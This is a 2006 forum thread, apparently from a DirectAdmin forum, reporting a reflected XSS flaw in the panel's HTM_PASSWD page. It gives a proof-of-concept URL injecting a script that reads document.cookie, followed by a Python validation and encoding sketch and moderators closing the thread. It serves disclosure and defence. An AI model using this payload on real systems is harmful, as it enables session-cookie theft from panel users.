XSS Attack On DirectAdmin



AKIN
04-30-2006, 04:25 AM
Tested On: http://www.directadmin.com/demo.html

Proof of Concept:

LOCAL XSS attack:

http://www.directadmin.com:2222/HTM_PASSWD?domain=".><script>alert(document.cookie)</script><!--





Solution:

contact advisory@aria-security.net
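
A defensive sketch for the reflected `domain` parameter shown in the proof of concept above, added here as an example; it is not part of the original post and not DirectAdmin's code. It assumes, hypothetically, that the value is echoed into an HTML attribute, and all function names are illustrative.

```python
import html
import re

# Payload taken from the proof-of-concept URL in the post above.
PAYLOAD = '".><script>alert(document.cookie)</script><!--'

# Hostname grammar: dot-separated labels of letters, digits and inner hyphens.
LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
DOMAIN_RE = re.compile(rf"{LABEL}(?:\.{LABEL})+")


def is_valid_domain(value: str) -> bool:
    """Allow-list check: accept only a syntactically valid domain name."""
    return len(value) <= 253 and DOMAIN_RE.fullmatch(value) is not None


def encode_attr(value: str) -> str:
    """Encode for an HTML attribute context (&, <, >, double and single quote)."""
    return html.escape(value, quote=True)


def render_vulnerable(domain: str) -> str:
    """Assumed flaw: the parameter is reflected into the page unencoded."""
    return f'<input type="hidden" name="domain" value="{domain}">'


def render_hardened(domain: str) -> str:
    """Reject anything that is not a domain, then encode on output anyway."""
    if not is_valid_domain(domain):
        raise ValueError("invalid domain parameter")
    return f'<input type="hidden" name="domain" value="{encode_attr(domain)}">'


if __name__ == "__main__":
    print(render_vulnerable(PAYLOAD))   # attribute is closed early, script tag survives
    print(encode_attr(PAYLOAD))         # markup characters become entities
    print(render_hardened("example.com"))
    try:
        render_hardened(PAYLOAD)
    except ValueError as exc:
        print("rejected:", exc)
```

Validation and output encoding are applied together so that a gap in one does not reopen the reflection.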

Aspegic
04-30-2006, 04:40 AM
This topic is being discussed in this thread:
http://www.directadmin.com/forum/showthread.php?s=&threadid=13152

To prevent information on this topic from being scattered throughout the forum, I recommend continuing the discussion in the other thread.

Thanks!

nobaloney
04-30-2006, 08:11 AM
This thread is now closed. Please use the other thread for any continued discussion.

Jeff